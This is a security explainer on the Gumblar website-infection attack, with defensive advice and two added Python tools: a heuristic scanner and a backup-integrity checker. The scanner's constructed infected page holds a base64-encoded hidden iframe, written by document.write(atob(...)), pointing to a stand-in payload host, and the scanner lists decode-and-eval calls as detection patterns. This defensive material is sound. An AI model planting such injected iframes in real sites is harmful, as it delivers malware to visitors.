What is a Gumblar Attack?


Gumblar is essentially a combination of exploit scripts and malware that work together to infect and spread. The attack got its name because the first series of malware was downloaded from the Chinese domain name gumblar.cn, hosted on a server based in the U.K. The attacker subsequently moved to another domain name, martuz.cn, and started delivering the malicious payload from there. Today some 1500+ domains host the malware, many of which are themselves innocent victims.

Gumblar is a kind of code injection attack in which the hacker introduces malicious code into the victim's website files. The attack begins when the computer of the website owner or administrator is compromised: the attacker obtains the FTP login credentials from that machine and uses them to upload malicious content to the website's hosting server. Malicious code is embedded in HTML, PHP and JavaScript files on the web server, so anyone visiting the website is exposed to the risk of being attacked.


How does the Gumblar attack operate?

Despite having surfaced way back in 2009, the Gumblar attack exists even today because of its continuing evolution and the manner in which it operates. Here is a simplified description of how Gumblar operates.

  1. A user visits a website that is infected with Gumblar and opens a web page that contains embedded Gumblar code. The Gumblar code is essentially base64-encoded, obfuscated malicious JavaScript together with an iframe embed.
  2. Through the embedded iframe backdoor, the malicious JavaScript silently downloads malware from the attacker's site hosted on some other server. The first such payload-delivering site was gumblar.cn; now there are several hundred such attacker sites. The downloaded malware finds its way onto the user's computer by taking advantage of vulnerabilities there. One of the ways this was done: the site sends the visitor an infected PDF that is opened by the visitor's browser or Acrobat Reader, and the PDF exploits a known vulnerability in Acrobat to gain access to the user's computer. Other means include exploiting vulnerabilities in Adobe Flash Player and the Java runtime environment.
  3. The downloaded malware now sits on the user's computer and begins stealing the user's information, essentially on the look-out for the FTP login credentials of any website(s) that the user owns or administers. It may download additional malware to aid it in the process. The malware finds FTP clients such as FileZilla and Dreamweaver and extracts their stored passwords, or it simply waits for the user to log in to one of his FTP accounts and grabs the credentials through its key logger. The malware is also capable of hooking several system application programming interfaces (APIs), which lets it monitor network activity and sniff for FTP credentials.
  4. Once the malware has gathered the FTP login URL, username and password, it sends them to a designated IP address, which is the IP address of the hacker.
  5. The hacker now uses the login credentials to log in to the user's website server. He downloads a copy of the victim's website files, viz. html, php, asp, aspx, js, etc., embeds obfuscated malicious JavaScript in them and re-uploads them to the user's web server. Now the user's website too is infected and becomes another source of Gumblar attacks. Thus it spreads and the infection cycle continues.

Why is Gumblar difficult to detect and remove?

The unique stealth mechanism of Gumblar is that the malicious script embedded in web pages is obfuscated. Obfuscation makes it difficult for security tools or anti-virus programs to detect and analyze the malware. Further, the attacker generates the obfuscated JavaScript dynamically, embedding a different script in each infected page of the victim's website. Not only does the script vary from site to site, it can also vary from page to page on the same site, though all variants deliver the same result. Since each embedded script is different, anti-malware software cannot match it against a known signature, which makes it difficult to detect and automatically remove.

The sites that the embedded Gumblar script connects to also change frequently, due to the very manner in which Gumblar operates. Gumblar turns victim web servers into hosts for the malware that is downloaded onto visitors' computers. Since new victims keep being added as it spreads, the sites that the embedded script connects to keep changing. Further, since the victim websites are legitimate sites, known and trusted by other web visitors, visiting users never suspect the web pages they download from such sites and may unknowingly further the spread.
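The indicators named in the steps above and in this section (base64-encoded, obfuscated inline JavaScript, decode-and-write calls, near-invisible iframes) can be hunted heuristically rather than by signature, which is the approach the per-page variation does not defeat. The following Python scanner is an added example written for this page, not code from How2Lab or from any Gumblar analysis. The entropy threshold, the list of suspicious calls, the sample pages and the .invalid host names inside them are assumptions or constructed data; it is meant to be run over a local copy of your own site.

```python
"""Heuristic scanner for injected content of the kind described above.
Constructed example: sample pages and host names are placeholders."""
import base64
import math
import os
import re
import tempfile

# Inline <script> blocks only; scripts loaded via src= are checked as .js files.
INLINE_SCRIPT = re.compile(r"<script(?![^>]*\bsrc=)[^>]*>(.*?)</script>", re.I | re.S)
# Calls that obfuscated droppers commonly use to decode and run a hidden string.
SUSPICIOUS_CALLS = re.compile(
    r"\b(eval|unescape|atob|String\.fromCharCode|document\.write)\s*\(", re.I)
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.I)
# 0/1-pixel or invisible iframes rarely have a legitimate reason to be on a page.
HIDDEN_STYLE = re.compile(
    r"visibility\s*:\s*hidden|display\s*:\s*none|(?:width|height)=[\"']?[01](?![0-9])", re.I)
ENTROPY_THRESHOLD = 5.0  # bits per character (assumed); hand-written JS sits well below this
SCAN_EXTENSIONS = (".html", ".htm", ".php", ".js")


def shannon_entropy(text: str) -> float:
    """Bits per character of the text; encoded blobs score higher than code or prose."""
    if not text:
        return 0.0
    n = len(text)
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def _decode_b64(blob: str) -> str:
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8", "replace")
    except ValueError:
        return ""


def scan_script(body: str) -> list[str]:
    """Flag decode/eval calls, high entropy, and base64 strings that decode to markup."""
    findings = []
    calls = sorted({c.lower() for c in SUSPICIOUS_CALLS.findall(body)})
    if calls:
        findings.append("script uses " + ", ".join(calls))
    entropy = shannon_entropy(body)
    if entropy > ENTROPY_THRESHOLD:
        findings.append(f"high-entropy script ({entropy:.2f} bits/char)")
    for blob in BASE64_RUN.findall(body):
        if re.search(r"<\s*(iframe|script)", _decode_b64(blob), re.I):
            findings.append("base64 string decodes to an iframe/script tag")
    return findings


def scan_html(html: str) -> list[str]:
    """Apply the script checks to every inline script and flag near-invisible iframes."""
    findings = []
    for match in INLINE_SCRIPT.finditer(html):
        findings.extend(scan_script(match.group(1)))
    for tag in IFRAME_TAG.findall(html):
        if HIDDEN_STYLE.search(tag):
            findings.append("near-invisible iframe: " + tag[:60])
    return findings


def scan_tree(root: str) -> dict[str, list[str]]:
    """Scan a local copy of the site; returns {relative path: findings} for flagged files."""
    report = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            findings = scan_script(text) if name.lower().endswith(".js") else scan_html(text)
            if findings:
                report[os.path.relpath(path, root).replace(os.sep, "/")] = findings
    return report


# Constructed samples: a clean page, and the same page with the two indicators the
# article describes added (a script that decodes and writes an iframe, plus a 0x0 iframe).
CLEAN_PAGE = """<html><head><title>Products</title>
<script src="/js/menu.js"></script></head>
<body><h1>Our products</h1><script>var year = 2024;</script></body></html>"""
_HIDDEN_IFRAME = ('<iframe src="http://payload-host.invalid/in.php" width="1" height="1" '
                  'style="visibility:hidden"></iframe>')
_ENCODED = base64.b64encode(_HIDDEN_IFRAME.encode()).decode()
INFECTED_PAGE = CLEAN_PAGE.replace(
    "</body>",
    f'<script>document.write(atob("{_ENCODED}"));</script>\n'
    '<iframe src="http://payload-host.invalid/x.php" width="0" height="0"></iframe></body>',
)

if __name__ == "__main__":
    site = tempfile.mkdtemp(prefix="site-copy-")
    for name, page in (("index.html", CLEAN_PAGE), ("about.php", INFECTED_PAGE)):
        with open(os.path.join(site, name), "w", encoding="utf-8") as fh:
            fh.write(page)
    for path, findings in scan_tree(site).items():
        print(path, "->", "; ".join(findings))
```

Run scan_tree() over a directory downloaded from your server. Findings are indications, not proof: a benign page can legitimately call document.write or carry a small iframe, so compare each flagged file against your clean backup. Conversely, a variant that decodes itself with a trick not in SUSPICIOUS_CALLS only shows up through the entropy or base64 checks, which is why the heuristics are kept together rather than relying on any one of them.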

Needless to say, the Gumblar hacker initially targeted popular websites so as to accelerate the spread. One of the first such victim sites was Yahoo.


How to Safeguard Your Website from a Gumblar Attack

It should be noted that infection by a Gumblar attack is not due to any web server vulnerability. Most hosting providers do enforce stringent security measures to safeguard your data. The attack is perpetrated through stolen FTP login credentials: the malware on an infected machine transmits the FTP information to the hacker's IP address, and that information is then used to log in to the web server and infect the hosted website. So the infection is not a server-wide exploit; it only infects sites on the server for which it has passwords.

Given the nature and scope of this attack, it is important that proper security measures be taken at all levels to prevent it. I would like to suggest a few steps that would reduce the vulnerability of your computer and remove existing threats. Note that your website can become a victim only if you are a webmaster who accesses web servers via FTP. If you are a mere website visitor and have nothing to do with uploading website files, you have no website for this attack to infect (your own computer still needs the antivirus and patching precautions below, since the malware reaches it through the browser as described in step 2).

  • Install antivirus software with the latest updates and ensure removal of any malware, trojans or key loggers on every computer that you use to manage your website's content via FTP. Several free antivirus products, such as AVG, AntiVir and Malwarebytes, are available for this purpose. Be careful not to download such free anti-virus software from unknown or untrusted websites. Regular virus scans will minimize such threats to a great extent, provided you always keep the virus signatures/patterns up to date.
  • Use a genuine licensed operating system and always keep system patches up to date. Also keep upgrading your browser to the latest version. Avoid trying out recently launched browsers; use one that has been established for years and comes from a reputed company.
  • When a computer is compromised, isolate it immediately from the network and clean it. Only once you are confident that the machine is clean should you change all FTP passwords; changing them from a still-infected machine simply hands the new passwords to the attacker's key logger. It is advisable to set complex passwords and change them regularly for added security.
  • The easiest way to clean a Gumblar-infected site is to upload a clean copy from a backup. Note, however, that Gumblar infects random files, so one missed file can lead to re-infection. Therefore, after changing your FTP password, delete all website files on the server and upload fresh, clean files from your local backup. Make a habit of maintaining a clean copy of your website files on your local computer, better still on an offline hard disk.
  • I also recommend that you avoid storing FTP passwords in the FTP clients that you use to upload your website pages. If multiple users have administrative rights to the FTP site, consider implementing strict password creation and renewal policies. You can further restrict FTP use by configuring your local network's firewall settings.
  • Though stolen FTP credentials are the major factor in a Gumblar attack, files can also be intercepted and infected while in transit, because plain FTP sends both credentials and files in clear text. Secure protocols such as SFTP, FTPS or SCP may be used instead of plain FTP to minimize this possibility. When transferring highly sensitive files electronically, it is advisable to encrypt the files before performing any kind of transfer. Setting up a more secure method of transferring files may be complicated, but the added security it provides is well worth the effort.
  • Periodically test your website for security issues. Also carry out vulnerability tests to check that your website code is secured against code injection, SQL injection, and cross-site scripting (XSS) attacks.
  • Avoid visiting untrustworthy websites that may redirect to or download related malware onto a system.
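The re-upload step above hinges on knowing which files were touched: Gumblar modifies arbitrary files and may also drop new ones, and a selective restore that misses one leaves a foothold. The following Python script is an added example, not code from How2Lab. It hashes a trusted local backup and a copy downloaded from the server and lists modified, added and missing files. The sample trees it builds in a temporary directory are constructed data, and the appended script block is a placeholder, not real injected code.

```python
"""Integrity comparison for the clean-up step: trusted local backup versus a
copy downloaded from the server. Constructed example; the sample trees are
written to a temporary directory and are not real site files."""
import hashlib
import os
import tempfile


def hash_tree(root: str) -> dict[str, str]:
    """SHA-256 of every file under root, keyed by its forward-slash relative path."""
    hashes = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            digest = hashlib.sha256()
            with open(path, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    digest.update(chunk)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            hashes[rel] = digest.hexdigest()
    return hashes


def compare_trees(clean: dict[str, str], server: dict[str, str]) -> dict[str, list[str]]:
    """Classify server files against the clean backup. 'added' matters as much as
    'modified': an injected file with no clean counterpart survives a selective re-upload."""
    return {
        "modified": sorted(p for p in clean if p in server and clean[p] != server[p]),
        "added": sorted(p for p in server if p not in clean),
        "missing": sorted(p for p in clean if p not in server),
    }


def _write(root: str, rel: str, text: str) -> None:
    path = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(text)


def build_sample_trees(base: str) -> tuple[str, str]:
    """Constructed data: a clean backup, and a server copy where one page carries an
    appended script block and one file has appeared that the backup never had."""
    clean, server = os.path.join(base, "clean"), os.path.join(base, "server")
    pages = {
        "index.html": "<html><body><h1>Home</h1></body></html>\n",
        "about.php": "<?php echo 'About us'; ?>\n",
        "js/menu.js": "function toggle(id) { /* menu code */ }\n",
    }
    for rel, text in pages.items():
        _write(clean, rel, text)
        _write(server, rel, text)
    # Placeholder standing in for an injected block; not real injected code.
    _write(server, "index.html", pages["index.html"] + "<script>/* injected stand-in */</script>\n")
    _write(server, "images/gallery.php", "<?php /* file absent from the backup */ ?>\n")
    return clean, server


def demo() -> dict[str, list[str]]:
    """Build the sample trees and return the comparison report."""
    clean, server = build_sample_trees(tempfile.mkdtemp(prefix="site-check-"))
    return compare_trees(hash_tree(clean), hash_tree(server))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths or '-'}")
```

Point hash_tree() at your backup and at a fresh download of the live site, taken over SFTP after the passwords have been changed from a clean machine. The "added" list deserves the closest look: a dropped file has no clean counterpart, so a restore that only overwrites existing files will not remove it, which is exactly why the advice above is to delete everything on the server and upload the full clean copy.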

About the Author
Rajeev Kumar
CEO, Computer Solutions
Jamshedpur, India

Rajeev Kumar is the primary author of How2Lab. He is a B.Tech. from IIT Kanpur with several years of experience in IT education and Software development. He has taught a wide spectrum of people including fresh young talents, students of premier engineering colleges & management institutes, and IT professionals.

Rajeev has founded Computer Solutions & Web Services Worldwide. He has hands-on experience of building a variety of websites and business applications, including SaaS-based ERP and e-commerce systems, and cloud-deployed operations management software for health-care, manufacturing and other industries.
